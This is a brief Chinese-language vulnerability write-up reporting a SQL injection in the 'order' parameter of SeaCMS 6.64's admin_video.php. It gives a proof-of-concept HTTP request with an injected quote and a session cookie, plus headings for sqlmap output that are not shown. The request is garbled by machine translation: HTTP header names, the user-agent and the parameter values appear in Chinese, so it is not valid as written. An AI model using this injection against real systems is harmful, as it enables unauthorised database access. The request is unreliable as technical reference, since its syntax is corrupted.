SeaCMS 6.64 sql注入

  

SeaCMS 6.64 sql注入

  

请求数据包:
订单参数存在sql注入

  

GET/seacms6.64/上传/admin/admin_video.php ?重复=ok&订单=v_name& allrepeat=好' HTTP/1.1
主持人:172.16.173.249
user - agent: Mozilla/5.0(麦金塔电脑;Intel Mac OS X 10.13;房车:Firefox 61.0)壁虎/20100101/61.0
接受:text/html, application/xhtml + xml应用程序/xml; q=0.9 /; q=0.8
接收语言:应用,zh型;q=0.8, zh-TW; q=0.7, zh-HK; q=0.5, en - us; q=0.3, en; q=0.2
推荐人:http://172.16.173.203/seacms6.64…e.php吗?action=重复
饼干:PHPSESSID=odsoljsk6cvfkvcgm0i03v8np6
连接:紧密
Upgrade-Insecure-Requests: 1

  

sqlmap扫描结果:
 SeaCMS 6.64 sql注入

  

数据库名:
 SeaCMS 6.64 sql注入

SeaCMS 6.64 sql注入